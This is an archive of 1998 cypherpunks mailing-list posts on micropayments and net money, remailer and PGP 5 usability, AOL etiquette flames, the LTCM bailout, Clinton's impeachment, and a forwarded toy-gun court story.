> trolling or are yourself severely clue-shy, and you aren't worth a response
> anymore. Your #2 is proof enough of that. #3 is pretty good evidence too.

Actually, neither.  I don't like lies and I don't like seeing the wrong
people get battered for wrongdoings.  I do find it mildly amusing that
noone posted anything to the jerk that signed up as Joe Cypherpunk. 
(That one definitely lives under a bridge.)

PHM




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul H. Merrill" <paulmerrill@acm.org>
Date: Sun, 27 Sep 1998 13:31:55 +0800
To: cypherpunks@Algebra.COM
Subject: Where I mail through and from  Was "Re:"
Message-ID: <360EAF59.5BBBB6B7@acm.org>
MIME-Version: 1.0
Content-Type: text/plain



Another method of discerning that information would have been to
actually read my posts which daid the same damn thing.  BTW, I lobbied
to have the server closed off when I worked for the school, but they
decided that was just a little too paranoid for them.

PHM




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul H. Merrill" <paulmerrill@acm.org>
Date: Sun, 27 Sep 1998 15:54:44 +0800
To: cypherpunks@Algebra.COM
Subject: Re:
In-Reply-To: <8b290243deab0d40b2006a5aaf21f9e9@anonymous>
Message-ID: <360ED0D0.FD404165@acm.org>
MIME-Version: 1.0
Content-Type: text/plain



<<snip>>
> I can't speak for Paul, but I figure that he's probably doing what he once
> said that he is, and using a modem link to AOL, using AOL for a routing
> service, then routing mail through the relay at CES. I don't know why
> someone would want to do that if they're sitting on a university network,
> but it doesn't matter much.

I only sat on a university network at work.  (the admin machine was
mine.)  Alas I no longer work there.  Shoot, I no longer work in that
state.  But it took longer to plug my computer back togeteher in the
motel room here than it did to get on the air with AOL here.
> 
> Can we have some signal somewhere, please?
> 
Certainly.  I just hate to leave things uncommented when they talk about
me.  I have made that mistake in the past (ignoring what people say
about me) and have had cause to regret it.

PHM

PHM




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 27 Sep 1998 20:03:41 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Cypherpunks defeat?
In-Reply-To: <199809231921.VAA12284@replay.com>
Message-ID: <4.0.2.19980927162224.00bb9d80@shell11.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



    --
Anonymous wrote:
> Most cypherpunks have become disillusioned about their
> dreams, and you will seldom hear them defend the notion
> that cryptography offers any kind of alternative to a
> society based on coercion.  The past few years have been
> hard ones.  The failure of digital cash, [....]
>
> Is the cypherpunks dream dead?  Is the movement over?
>
> Maybe it is time to give up. 

We are not defeated.

We have won many key victories, and only one, though the
biggest one, remains to be accomplished.

Our failures have had obvious and remediable causes.

Few people use encryption technology today, because few
people have real need of it.

Few people have real need of it, because there is no
reasonably liquid net money. People are not making, spending,
transferring, and promising, money through the net, so they
have little need to encrypt their messages or care for the
reputation of their nyms.

And that is the big remaining battle.

Net money.  Net money that is reasonably liquid, that many
people acquire, that many people spend, money that is readily
convertible to worthwhile goods and services.  Don't worry
about blinding and all that.  Once any sort of net money is
flowing in large amounts, all that stuff then becomes
possible and desirable.  If there is no liquidity, nobody
cares about blinding, and if you have blinding it does you no
good anyway without liquidity.

Once we get that, we will shortly get it all.  As long as we
do not have that, we have very little.

Digicash failed because it was proprietary.  For net money to
be a success we need a standard for transferring promises to
pay that is separate from the software issuers, and thus
separate from the issuers of promises to pay or deliver.  It
has to be a standard such that anybody can play, anyone can
write software that will interoperate with software written
by others, and anyone can issue promises to deliver anything,
so that Ann, Bob, and Carol can transfer and exchange
promises between each other subject only to the need to trust
each other, without needing permissions or licenses from
anyone else.

And it has to have software that is competitive with existing
methods of transferring value.

Credit cards are very competitive for transactions of modest
size, because of the additional services, in particular
dispute arbitration and resolution provided by the card
issuers, and because of their large installed base. Smaller
players cannot hope to compete in that area.

We have however no adequate means for small payments, five
dollars to fractions of a cent. This offers a fertile
opportunity for the development of netmoney.

We also have no entirely satisfactory means for large low
margin payments..

The large payment problem could be addressed by some system
that provided a tight connection between internet money and
US dollars in US banks, or, better, a system that provided a
tight connection between internet money and US dollars in non
US banks, or, if we had a large and liquid micropayment
system, it could be provided by a tight connection between
micro and macropayments.

If several banks in some moderately popular banking haven
allowed people to transfer funds instantly and cheaply from
one account to another within the haven, through digitally
signed messages passing through https protocol, this would
make it possible to readily solve the large payment problem
by offering the means to create a tight connection between
net dollars and offshore dollars.  If this were done then the
revolution would ensue within a few years. So far none have
been willing to do this, perhaps out of fear of reprisals,
more likely out of sheer inertia.

The offshore dollar system is probably larger and more
liquid, and is certainly considerably more free, than the
onshore dollar system, but it is inconvenient for modest 
payments. People use it primarily for transfers of many
thousands of dollars.  Also the connection between the
offshore dollar and the onshore dollar is weak, because it is 
inconvenient, slow, and costly, to transfer dollars between
the offshore and onshore banking systems.

I see no possibility that anyone will be permitted to create
a strong connection between an internet dollar and the
onshore dollar, whereas it is quite possible that someone
will get away with creating a strong connection between the
internet dollar and the offshore dollar.

Alternatively, (and perhaps more likely) a satisfactory
solution to the micropayment problem automatically brings in 
its train a solution to the large payment problem, since the
software must accumulate many small promises into a few large
promises, and provide means to transfer these large promises
through numerous intermediaries, thus a large volume of
micropayments will create the liquidity for macropayments.
We do not need the banks to win this one, though they would
be very handy.

Large promises to pay could acquire value not through a fast
and cheap connection to the banking system, whether onshore
of offshore, but through a fast and cheap connection to the 
micropayment system, resulting in an internet dollar that
derives its liquidity from the internet market, and is
coupled to the US dollar no more strongly, and no less
strongly, than the offshore dollar is coupled to the onshore
dollar.

Of course for this to work, we will need a large and liquid
market for aggregated micropayments. The existing finance
systems for self publishing, dirty pictures, and gambling,
really do not work very well, so there seems an obvious and
large market for micropayments.

Jakob Nielsen, an apparently well informed internet commerce
pundit who claims familiarity with lots of market research
and has himself done lots of market research has argued that 
there is a large and compelling market for micropayments  
"The Case for Micropayments" 
http://www.useit.com/alertbox/980125.html

Jakob Nielsen:
       Some analysts say that users don't want to be
       "nickeled and dimed" while they are online. In fact,
       the problem is being dimed; not being nickeled.
       Unfortunately, some sites that currently charge for
       content do so at a level of a dollar or more per page.
       Such pricing is obviously unpleasant and will only be
       acceptable for highly  value-added content that users
       can predict in advance that they will benefit 
       significantly from buying. Regular articles (like this
       column) cannot be that expensive. 

       Long-distance telephone calls and electricity are both 
       metered services. Many people do feel a tension while 
       they are on the phone, at least while making an 
       international or other expensive call. At the same 
       time, very few people worry about powering a 
       lightbulb, even though doing so costs a few cents per 
       hour. Electricity charges mainly serve to make people 
       turn off the lights when they go to bed. The 
       difference is clearly in the level of pricing:

       less than a cent per minute and people use as much as 
       they need (electricity) 10 cents per minute, and 
       people ration their usage a little (long distance 
       phone calls) 40 cents per minute, and people ration 
       their usage a lot (international calls)  On the Web, 
       users should not worry about a cent per page. If a 
       page is not worth a cent, then you should not download 
       it in the first place. Even as the Web grows in 
       importance in the future, most people will probably 
       access less than 100 non-free pages per day (in June 
       1998, heavy users visited an average of 46 pages per 
       day).  Most users will have $10-$30 in monthly service 
       charges for Web content. 
	   
One cent, or half a cent, is probably the sweet spot for
pages and dirty picture, with quarters being the sweet spot
for games and gambling.

Obviously pay pages cannot and should not be searched by
search engines, so the typical design would be a free,
searchable, index page containing lead in paragraphs and pay
links to the non free pages on the site, or a collection of
free summary pages each containing a pay link to the
corresponding non free page, or (better) both a free index
page and also a collection of free summary pages.

We want the payment system to introduce no additional delays
when we click on a link, so the index page should cause any
necessary negotiations between the browser and server so that 
the server is ready to accept the coins of this particular
user, so that the user can get the pay page with a single
message, a single URL containing a coin.  The server then
immediately starts downloading the page without waiting for
any further messages to complete, and simultaneously attempts
to deposit the coin.

Suppose you are browsing dirty pictures, and both you and the
server are clients of the same token issuer.  Then the token
issuer knows that you are browsing the dirty picture pages,
and knows how much money the dirty picture issuer is making.

But for the scheme to be successful, we need many token
issuers, and the means to transfer aggregated token values
between issuers, so that in general the entity that takes
your bank money and provides you with net money, and the
entity that takes the dirty pictures servers netmoney and
provides it with bank money, will be very different entities, 
probably in very different jurisdictions, separated by a
chain of intermediaries, who have an economic incentive to
aggregate transactions, thus obscuring individual spending
and getting.

If any creditworthy person can issue tokens, privacy is not
such a big problem, and if the aggregated values representing
large numbers of tokens are readily transferable in a large
liquid market intermediary market, it is not a problem at
all, since the dirty picture issuer and the guy looking at
the dirty pictures are likely to be anonymous to the token 
issuer.

The IBM token scheme provides for intermediaries.  Previous
token schemes did not.  This is an important step forward.
Until now, no one has issued a micropayment scheme that had a 
ghost of a chance. The IBM scheme seem basically workable,
though I need to examine it further.

Micropayments have not failed.  They have not yet been tried.
We still have not seen a scheme attempted that had all the
requirements that real netmoney will need.  It is simply 
quite a bit of work to design these things, and to get them
deployed in a form that ordinary mortals can use.   

    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     NPL9VZbCi5pP9i/NPYToSVmWYTnX2mbqCxE3CBmj
     4RNCFUvHIWJi/I6WQfi1zBE3fjEMJNMx41wskrUiI
-----------------------------------------------------
We have the right to defend ourselves and our property, because 
of the kind of animals that we are. True law derives from this 
right, not from the arbitrary power of the omnipotent state.


http://www.jim.com/jamesd/      James A. Donald




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@remailer.ch>
Date: Sun, 27 Sep 1998 12:23:04 +0800
To: cypherpunks@Algebra.COM
Subject: Re:
Message-ID: <19980927173408.26863.qmail@hades.rpini.com>
MIME-Version: 1.0
Content-Type: text/plain



Paul is coming from AOL using Netscape as a mailer and using the 
open relay at cesvxa.ces.edu.

Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id CAA16186 for cypherpunks-unedited-outgoing; Sun, 27 Sep 1998 02:59:59 -0700 (PDT)
Received: from cesvxa (cesvxa.ces.edu [144.50.1.2]) by toad.com (8.7.5/8.7.3) with ESMTP id CAA16181 for <cypherpunks@toad.com>; Sun, 27 Sep 1998 02:59:56
-0700 (PDT)
Received: from 200-148-112.ipt.aol.com (200-148-112.ipt.aol.com)
 by cesvxa.ces.edu (PMDF V5.0-6 #6874) id <01J2AH6J8P400003T4@cesvxa.ces.edu>
 for cypherpunks@toad.com; Sun, 27 Sep 1998 06:01:57 -0500 (EST)
Date: Sun, 27 Sep 1998 05:59:49 -0700
From: "Paul H. Merrill" <paulmerrill@acm.org>
Subject: Re:
To: cypherpunks@toad.com
Message-id: <360E36C5.33C7DFDC@acm.org>
Organization: Twenty First Century Camelot
MIME-version: 1.0
X-Mailer: Mozilla 4.06 [en] (Win16; U)
Content-type: text/plain; charset=us-ascii
Content-transfer-encoding: 7bit
References: <199809270531.HAA09168@replay.com>
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Transfer-Encoding: 7bit









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous lo14 <nobody@lo14.wroc.pl>
Date: Sun, 27 Sep 1998 12:59:19 +0800
To: cypherpunks@toad.com
Subject: Re:
Message-ID: <bef845b0ecca21ff8860c404f6d17a10@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



Paul H. Merrill wrote:

>1.  There are lies, damn lies, and statistics.

Nice cliche. Unfortunately, it doesn't say anything at all.

>2.  So if the quoted material is included it's bad and if it is not
>included it's bad. I think I see the general idea.  Use the rules
>appropriate for complaining about whoever you want to complain about.

You got it half right. If quoted material is included, it's good. If no
quoted material is included, it's bad. If quoted material is included but it
uses the '<< >>' style, it's bad. If a few hundred lines are quoted and six
added, it's bad. This was explained to you twice; once in the post you're 
responding to, and once in that posting with the AOL quotes. You're 
conveniently ignoring that and you're playing dumb with regard to network
etiquette. Maybe you aren't just pretending.

AOL users originally didn't quote at all, they claimed because of software
constraints. AOL users complained and used the fact that their ISP was lame
as an excuse for not getting another one. Other net users complained. AOL 
responded by using the '<< >>' quoting style, which was effectively giving 
the rest of the net the bird. 

If AOL didn't cater to every moron out there, and if AOL didn't keep running
stupid ads with claims like "AOL is the Internet!", and if AOL wasn't
sending things like requests for Real Player all over the net, and if AOL 
didn't do things to deliberately piss everyone else off, they'd have a much 
better reputation. Maybe the first two can be written off as simple 
marketting, and maybe the third can be written off as the results of that 
marketting, but there is no excuse for the fourth. All four of those are
what gets AOL flamed, kill filed, ignored, insulted, and shunned.

>3.  And what I said was along the lines of most were justified, but some
>showed his lack of clues.  Merely being incomprehensible to a person
>means little if the person is a little clue-shy.  Badly written is a bad
>thing.

There were one or two which may have been questionable. The rest of them
fell into his criteria quite well. That's unless you want to claim that
requests for stickers, CDs, and the rest actually express some subtle
political point other than to say "I'm a moron." I ensure you, if "We're
morons" was the point the AOL posters in question were trying to make, their
message came through quite well. Maybe "you got it?" was actually a secret
code.

>> > > I don't know which is worse. At least the people flaming the AOL wimps are
>> > > funny.
>> >
>> > If funny is all you want, may I recommend rec.humor.funny and, in case
>> > you are up on no current events but Clinton, rec.humor.funny.reruns.
>>
>> No, I want a Cypherpunks list which discusses political issues,
>> cryptography, and things related to that. Since this is the Cypherpunks
>> list, we aren't going to censor on the basis of content or origin point.
>>
>And the general degradation of our society to the level that taking the
>moral ground is something to be ridiculed is not a political issue?

I was refering to the spam from AOL, Sixdegrees, the "child molestor"
spammers, and their like. The responses to that, including your's, are 
political speech like you describe. What you're being ridiculed for is, 
almost without fail, defending every AOL weenie and spam site which comes 
onto this list. 

The child molestor spammers may be able to claim that it isn't their fault
because they're using lame software, but if they use swiss cheese they
shouldn't be surprised when the holes are exploited. I'm not saying it's
very ethical to exploit them, but it isn't surprising.

Paul, with regard to the rest of this, it's obvious that you're either
trolling or are yourself severely clue-shy, and you aren't worth a response 
anymore. Your #2 is proof enough of that. #3 is pretty good evidence too. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Sun, 27 Sep 1998 04:36:41 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Clinton's fake apologies (fwd)
In-Reply-To: <19980927052400.21818.qmail@hades.rpini.com>
Message-ID: <3.0.5.32.19980927194009.0083aca0@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain



At 05:24 AM 9/27/98 -0000, Anonymous wrote:
>
>Well, this *is* a pathetic reason. You want Clinton impeached because the
>media tells you so.

Have you ever been in the military, Anonymouse? I've noticed that military,
and those with past military service or experience tend to identify with
different aspects of an issue than those without any sort of military
experience. As a serviceman myself, I am compelled to say that to me, you
sound like a 60s era war protester, or perhaps something far worse.
Objecting for reasons of princible, seemingly to spite the real world
considerations, and ignoring the reasons of princible that are in
contradiction to your own viewpoint. The real world is not a princibled
place, but some people do get bonus points for maintaining appearances.
Clinton just suffered an "Aw Shit!", he's lost his turn to play, he needs
to get his shit together and get out of the game. I trust you've also seen
the quote attributed to Clinton, on Nixon? Nixon must be turning over in
his grave, even if it isn't Clintons Quote.

I do not consider 'the presidency' to be a 'man'. I see it as an
institution, a figurehead, a place of honor. The President is a man who,
for four years, (or eight) places his own life in standby, for the greater
good of the nation. What good was served by all the affairs Clinton may
have and did have? What good was served by the apparent use of positional
authority to suppress evidence? What good would be served by allowing a
person with the quality set Clinton has demonstrated to remain in THAT Office?
It, more than many other things in american society, function on
'appearances'. That appearance is now tarnished. The sitting president has
lowered himself, and that office, irreparably. He, we and it are laughing
stocks around the world right now. Did you know that the sitting president
in the philippines used Clintons sex scandals in his own election campaign?
Something to do with Clinton getting all the sex scandals, him getting all
the sex. That was long BEFORE Clinton admitted to misrepresenting events. I
shudder to think how this will affect international negotiations, and
Status Of Forces Agreements around the world. Think the Chinese won't look
to use it in the ongoing human rights negotiations?

Yeah, I'm young enough to still feel patriotic, but old enough that I make
my own definition of that term, instead of blindly accepting someone elses.

I don't think a change is in order because I heard some horses ass for an
alphabet news agency say so, I think a change is in order because I
personally can't stand hypocrites, among other things. Especially
hypocrites who commit felonies, say "sorry" and I am expected to forgive,
and stand idly by while he gets away with it. As I've said before, I
personally could care less if he has an affair. But he had one with a
subordinate in his direct employ, then lied about it, repeatedly, even
while under oath in a court of law. He tried to use his positional
authority to suppress evidence, to intimidate, to get the case(s) dismissed. 
Yeah, I'm REAL PROUD(tm) of my Commander In Chief, he and
CSapronett@aol.com will both have a lot to talk about. Or was that you?

Perhaps you are one of the Klintonistas, with your "what is the big deal"
attitude, deliberately obfuscating the issue, sidelining the real topics
with irrelevant byline chatter. 

If that was me, I'd be doing jail time. If this is allowed to stand, it
will represent the opening salvo, and mark the beginning of the End of
America as a Great Nation(tm).

>As far as the "newby" flame, I've seen that corpse lists here twice recently.
>Maybe you've dated yourself? I remember a time without Reeza! posts... 

Yeah, I can imagine a time when crypto and anonymous accounts don't exist
anymore either. That doesn't mean that it would be a Good Thing(tm). You,
I, anyone is free to browse the archives, then represent self as an
'old-timer' on this list. From an anonymous account, who can challenge?

So what. you don't even have the courage to put your name, or an e-mail
account that can be replied to, when you send your "I'm better than you,
'cuz I've been on the list longer' drivel. Perhaps you have, but it doesn't
change anything.

I am still outspoken,
you are still loath to reveal your identity, even when discussing something
as innocuous as this. Spineless is the term normally used.
And Clinton is still an adulterous purjurer who needs conviction.

If you can't handle that, I suggest you discuss it with your family
physician. I'm sure a wee bit of prozac will help you deal with lifes
disappointments, you must be feeling especially lowly right now,,,, if you
are not, you should.

Reeza!



"...The world was on fire, but no one could save me but you...
	Strange what desire will make foolish people do...
		(and the background vocalists sang)
			This world is only gonna break your heart...."

					==C.I.==




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sun, 27 Sep 1998 21:59:24 +0800
To: cypherpunks@Algebra.COM
Subject: Meriweather v. Gates
Message-ID: <v03130300b234a90194f5@[209.66.100.49]>
MIME-Version: 1.0
Content-Type: text/plain




It's an ironic indication of where we are that Bill Gates is being hounded
by the Justice Department, Sun Microsystems, Netscape, Novell, and Ralph
Nader while no one is hounding John Meriweather. In fact, the Federal
Reserve System, nominally nongovernmental (wink wink) just helped to bailed
out his firm, Long-Term Capital Management.

Gates, you see, has a non-leveraged investment of $50 billion in Microsoft.
No borrowing, no margin debt, just plain old-fashioned ownership.

Meriweather, on the other hand, started in 1991 and took in money from
speculators. He took the $2.2 billion and borrowed with it, hitting the
$125 B in borrowed assets point. Then he and his rocket scientists
essentially borrowed still more, using this $125 B to leverage $1.25 T. (T
for "trillion.")

Not  bad, going from $2.2 B to $1.25 T, a mere 500-fold increase.

(Like taking the money one planned to spend on a new PC, a couple of
thousand or so, and instead controlling a million dollars worth of
financial instruments.)

Had the folks at LTCM made the right bet on the roulette wheel, by guessing
the direction of interest rates, the tens of billions of profits would have
been theirs to keep, with little work on their part. (Some of the
principals are now disclaiming responsibility, saying LTCM was only a
sideline interest.)

Ah, but they guessed wrong, and now they and their lenders are being
bailed out. In America, profits are private but losses are public.

Meanwhile, Gates sticks to building up his company, selling actual
products.  No margin debt, no loans for the American taxpayer to cover, no
overextended lines of credit. Oh, the horror of it!

Gates must be attacked by the U.S. government and all of his incompetent
competitors! He must be driven out of business! We need to  make the world
safer for folks like Meriweather.

(Think of what Meriweather could be doing with the $50 B that Gates has!
Instead of being worth a piddling $50 billion, Meriweather and Scholes and
that bunch could double down, double down again, and again, and turn it
into $25 trillion! All with just some computer commands. American
capitalism at its best.)

We bail out Meriweather. We try to bust Gates. I'm going to  be sick.

The reformatting of this country is overdue.

--Tim May


(This space left blank pending determ. of acceptability to the gov't.)
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 27 Sep 1998 22:58:52 +0800
To: "Robert A. Costner" <cypherpunks@cyberpass.net
Subject: Re: Cypherpunks defeat?
In-Reply-To: <4.0.2.19980927162224.00bb9d80@shell11.ba.best.com>
Message-ID: <199809280358.UAA27338@proxy3.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



    --
At 05:10 PM 9/27/98 -0700, James A. Donald wrote:
> > But for the scheme to be successful, we need many token 
> > issuers

At 10:32 PM 9/27/98 -0400, Robert A. Costner wrote:
> Is there existing open software available for this?

IBM is proposing that anyone, or many people, will be free to
act as issuers of promises to pay in their proposed microcash
system.  Obviously their system is not very open, but unlike
previous amateurish proposals for microcash, it does support
a rich system of intermediaries transferring aggregated
promises to pay.

We really need an open system, which IBM is not, which goes
down to millicent values, which IBM does not, and which
supports intermediaries moving aggregated transactions, so
that customer and server to not have to be clients of the
same intermediary, which IBM does support, and previous
proposals for micropayment did not.

    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     Wew5mzbrzY0w3HicOSQ4AfZq5mUz1m+2tsx31B+Z
     4qFN1ClYcfHx6uSYTNssozZoWye7rdANKGzzp16kS
-----------------------------------------------------
We have the right to defend ourselves and our property, because 
of the kind of animals that we are. True law derives from this 
right, not from the arbitrary power of the omnipotent state.


http://www.jim.com/jamesd/      James A. Donald




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sun, 27 Sep 1998 13:47:32 +0800
To: cypherpunks@cyberpass.net
Subject: Remailers, PGP, and a Project Suggestion
Message-ID: <199809271850.UAA23726@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 27 Sep 1998, Anonymous wrote:

> At 23 Sep 1998 04:27:46 Reeza! wrote:
> > anonymouse, 32 bit aohell to boot. you must feel very safe. Yours is hardly
> > the type of post that might necessitate the use of a remailer, so it should
> > be safe to assume you haven't the courage to stand behind your words, even
> > as mild as they are.
> >
> > Fuck you too. I suggest you discuss your lack of a spine with the maker.
> > See the above for instructions to meet the maker.
> >
> > Reeza!
>
> Hello? This is an old topic, but what the heck...
>
> There is a concept cypherpunks have called "Blacknet", which is an
> organisation that sells profiles of prospective employees based on
> their public comments on the Internet.
>
> This allows employers to filter out undesirables who might or might
> not have outgrown their rebellious youth. (You can never be too safe!)

Even this is a secondary issue.

Many people are using remailers these days because of the advent of the
WWW. Virtually anything written, retrieved, or transfered on the Internet
is vulnerable to monitoring, logging, and future use against you. Even if
you trust the guy you're sending mail to, you can't necessarily trust his
computer security or the security of the network. Systems like Dejanews
and the web search engines illustrate just how much of a log is out there.
That isn't counting the information available solely from mail headers and
IP addresses.

When somebody wants to perform a "great purge," they just go off to a
search engine or database, type in some parameters, and get a list of
people to shoot, jail, or harass.

The natural solution to this is to disguise your identity whenever
possible. I estimate that we have several dozen people who actively post
to Cypherpunks through remailers judging by the way some things are stated
in the postings. I can't tell for sure, and that's the point.

If you want to generate reputation capital, use a nym server. Nym servers
make it obvious that you're using a nym, but it allows you to generate as
many reputations as you want and keep them separate. They're hard to use
without a tool, even for the best of us. Premail leaves a lot to be
desired in that it's slow, has some bugs, and lacks some good features,
but most of the people who want to create a new version seem to live in
the U.S..

The real advantage of the nym servers is that they allow people to see the
origin of the message at a glance. You can do the same thing with regular
anonymous remailers, but you have to verify the signature rather than
glancing at the headers. You should still verify the signature in either
case. This was less of a problem than it once was because premail was out
there, until PGP 5 came out.

PGP 5.x is incompatable with previous versions since it changed both the
protocols and the command line interface. Unfortunately, they changed the
command line interface in a rather stupid way. They also wound up
releasing the Windows version before the UNIX version (by something like
three months).

They seem to check argv[0] to determine what kind of operation you want to
do. 'pgp -seat' won't work anymore. Instead, it's a variant under 'pgpe'.
One PGP binary is created, and several links are set up. The result is
that you can't change the name of the binaries and links if you want. If
there's an advantage to this, I sure don't see it.

When they released the Windows version, Windows users understandably
snatched it up and started using it. The result was a bunch of
incompatabilities between two platforms which could have easily been
solved had PGP, Inc. exercised a little more discression.

That's a moot point now, though. The problem which still remains is the
command line interface. It breaks any script which references PGP, and
that's the main problem.

What UNIX really needs is some kind of mailer which integrates an updated
premail, PGP 2.x support, and PGP 5.x support. Unfortunately, much to the
delight of the government, the people who would code such a thing are
probably in the U.S. like I am.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sun, 27 Sep 1998 20:58:08 +0800
To: users@einstein.ssz.com (SSZ User Mail List)
Subject: GNUcash [/.]
Message-ID: <199809280200.VAA05655@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> X-within-URL: http://www.gnucash.org/

>    content   In the spirit of cooperation we bring you The GnuCash
>    Project. We all realized that it was senseless to have several
>    different projects working toward the same goals. So we did the most
>    logical thing, we merged! The result of this merger is the GnuCash
>    Project.
>    
>    Some of the projects that merged included X-Accountant, and GnoMoney.
>    GnuCash will be based on the lastest version of Xacc. We will use the
>    "transaction engine" from Xacc, and port the GUI from Motif to
>    Gnome/Gtk. Several other significant features will also be added. Such
>    as support for splits, and online banking via OFX. To see a list of
>    other planned features please check out the features page.
>    
>    There is unfortunately no stable version of GnuCash available yet. So
>    if you are interested in using a financial package now I suggest using
>    the lastest version of Xacc, which is a very stable, and full featured
>    piece of software! =) Check out the pages below for more info on Xacc.

>    News 09-17-98
>      * ANNOUNCE - Gnucash 1.1.18 is released. Get it at ftp.gnucash.org


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Costner" <pooh@efga.org>
Date: Sun, 27 Sep 1998 21:31:48 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Cypherpunks defeat?
In-Reply-To: <199809231921.VAA12284@replay.com>
Message-ID: <3.0.3.32.19980927223248.03463a7c@mail.atl.bellsouth.net>
MIME-Version: 1.0
Content-Type: text/plain



At 05:10 PM 9/27/98 -0700, James A. Donald wrote:
>Few people use encryption technology today, because few
>people have real need of it.

I would tend to disagree with this.  Instead, few people use encryption
technology today because encryption technology is seldom transparent to the
user.

Few users "think" encryption when they use SSL.  It is transparent.  I
suspect that if you were to survey recent users of SSL pages, you would
find that most believe they have not used encryption in the last week.

When PGP 5.x came out, suddenly encryption became, not widely used, but
much more widely than before.  Encryption in email became somewhat
transparent in the sending process of email, but still non transparent in
the transport and receiving of the email.  The user can easily tell the
difference between an encrypted and a non encrypted message.  This non
transparent quality is still a problem.  

Compare this with forged headers (which mainly are hidden in most email
clients).  Forged headers are transparent to the receiver until a closer
look is made.  To compare the two, with encrypted email the message is not
readily apparent.  An action must be taken (with Eudora/PGP and S-Mime
about four actions) to see the text of the message.  On the other hand,
with forged headers the message is apparent, and an action must be taken to
determine that it is not a valid message.

If my email came to me encrypted, only decipherable with my private key
with no passphrase or other action by me, I would be happy.  My computer
sits next to a drawer containing a pile of cash.  I perceive the cash to be
secured.  I also perceive my computer to be secured.  I want my encryption
transparent.

>reasonably liquid net money... so they
>have little need to encrypt their messages

I personally would like all my cell phone, cordless phone, and email
communications transparently encrypted.  If it were an option, and was
seamless  transparent, and the same price, then I suspect most people would
as well.

>If several banks in some moderately popular banking haven
>allowed people to transfer funds instantly and cheaply from

Yes, this has been a big problem.  Teller machines are now at about $1 per
transaction to cross networks.  Most of the internet payment systems
require a large chunk of the money be retained by the processing system.
Secure servers often want 12% to 50% of the transaction.  PC banking has
monthly charges.

>One cent, or half a cent, is probably the sweet spot for
>pages and dirty picture, with quarters being the sweet spot
>for games and gambling.

I would suggest millicent to 1/100 of a penny for web page access.  A penny
a click would make me think twice, 1/100 of a penny would not cause me to
consider it.  But to be honest, today I would avoid a pay site and go to
the free sites.

>Obviously pay pages cannot and should not be searched by
>search engines

If my pages were for pay, I would want them to turn up in the search
engines.  This is easy enough.  When I examine my logs, I can easily see
when certain search engines come looking.  The micropayment software simply
has to be configurable to allow certain IP addresses to be allowed to pass
without paying.

>But for the scheme to be successful, we need many token
>issuers

Is there existing open software available for this?


  -- Robert Costner                  Phone: (770) 512-8746
     Electronic Frontiers Georgia    mailto:pooh@efga.org  
     http://www.efga.org/            run PGP 5.0 for my public key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Sun, 27 Sep 1998 22:24:27 +0800
To: "Donna Ferolie, Canadian Institute for Legislative Action" <Alexdoulis@aol.com>
Subject: Police would never exagerate ? Guess what...
Message-ID: <199809280318.XAA09972@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain



==================BEGIN FORWARDED MESSAGE==================
>Date: Mon, 28 Sep 1998 09:57:46 +0930
>From: SSAA <Sporting.Shooters.Association@adelaide.on.net>
>Subject: NEWS - Toy Pistol case dismissed
>Reply-to: Sporting.Shooters.Association@adelaide.on.net

THE SUNDAY TELEGRAPH, Sydney.    Sept 27.by Wayne Jones.
A MAGISTRATE has dismissed charges against a 165 year old boy who faced
jail for possessin a toy cap gun.
The magistrate, Hal Halenstean, made the decision after hearing what he
described as a "silly case" on Friday.
"We all have better things to do", Mr Halenstein said,
The boy, who cannot be identified bought the toy cap gun from a toy
stall at Victoria's Dandednong Market on May 12.
Minutes later, police looking for drug dealers found the cap gun in the
boy's jacket. They charged boy with several firearm offences which carry
a jail sentence.
In court, Mr Halenstein twice gave prosecutors on opportunity to
withdraw the charges against the boy, but police indicated they would
continue to contest the case.
Using special provisions of the Sentencing Act, Mr Halenstein then
dissmissed the charges.
